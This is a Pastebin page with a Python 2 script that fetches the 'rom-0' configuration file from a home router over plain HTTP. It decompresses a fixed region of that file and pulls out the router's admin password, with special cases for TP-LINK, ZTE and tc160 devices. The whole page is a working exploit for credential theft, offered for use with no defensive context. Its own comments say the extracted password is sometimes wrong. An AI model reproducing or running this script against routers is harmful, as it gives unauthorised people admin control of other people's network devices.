Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import os
- import sys
- import urllib
- import requests
- import telnetlib
- import collections
- class BitReader:
- def __init__(self, bytes):
- self._bits = collections.deque()
- for byte in bytes:
- byte = ord(byte)
- for n in xrange(8):
- self._bits.append(bool((byte >> (7-n)) & 1))
- def getBit(self):
- return self._bits.popleft()
- def getBits(self, num):
- res = 0
- for i in xrange(num):
- res += self.getBit() << num-1-i
- return res
- def getByte(self):
- return self.getBits(8)
- def __len__(self):
- return len(self._bits)
- class RingList:
- def __init__(self, length):
- self.__data__ = collections.deque()
- self.__full__ = False
- self.__max__ = length
- def append(self, x):
- if self.__full__:
- self.__data__.popleft()
- self.__data__.append(x)
- if self.size() == self.__max__:
- self.__full__ = True
- def get(self):
- return self.__data__
- def size(self):
- return len(self.__data__)
- def maxsize(self):
- return self.__max__
- def __getitem__(self, n):
- if n >= self.size():
- return None
- return self.__data__[n]
- def decodePasswordLocal(host):
- # Sometimes this might output a wrong password while finding the exact string.
- # print the result as mentioned below and manually find out
- fname = 'rom-0'
- if os.path.isfile(fname) == True:
- os.remove(fname)
- urllib.urlretrieve ("http://"+host+"/rom-0", fname)
- fpos=8568
- fend=8788
- fhandle=file('rom-0')
- fhandle.seek(fpos)
- chunk="*"
- amount=221
- while fpos < fend:
- if fend-fpos < amount:
- amount = amount
- data = fhandle.read(amount)
- fpos += len(data)
- reader = BitReader(data)
- result = ''
- window = RingList(2048)
- while True:
- bit = reader.getBit()
- if not bit:
- char = reader.getByte()
- result += chr(char)
- window.append(char)
- else:
- bit = reader.getBit()
- if bit:
- offset = reader.getBits(7)
- if offset == 0:
- break
- else:
- offset = reader.getBits(11)
- lenField = reader.getBits(2)
- if lenField < 3:
- lenght = lenField + 2
- else:
- lenField <<= 2
- lenField += reader.getBits(2)
- if lenField < 15:
- lenght = (lenField & 0x0f) + 5
- else:
- lenCounter = 0
- lenField = reader.getBits(4)
- while lenField == 15:
- lenField = reader.getBits(4)
- lenCounter += 1
- lenght = 15*lenCounter + 8 + lenField
- for i in xrange(lenght):
- char = window[-offset]
- result += chr(char)
- window.append(char)
- result = filter_non_printable(result).decode('unicode_escape').encode('ascii','ignore')
- # In case the password you see is wrong while filtering, manually print it from here and findout.
- #print result
- if 'TP-LINK' in result:
- result = ''.join(result.split()).split('TP-LINK', 1)[0] + 'TP-LINK';
- result = result.replace("TP-LINK", "")
- result = result[1:]
- if 'ZTE' in result:
- result = ''.join(result.split()).split('ZTE', 1)[0] + 'ZTE';
- result = result.replace("ZTE", "")
- result = result[1:]
- if 'tc160' in result:
- result = ''.join(result.split()).split('tc160', 1)[0] + 'tc160';
- result = result.replace("tc160", "")
- result = result[1:]
- return result
- def filter_non_printable(str):
- return ''.join([c for c in str if ord(c) > 31 or ord(c) == 9])
- print '"' + decodePasswordLocal("192.168.1.1") + '"'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
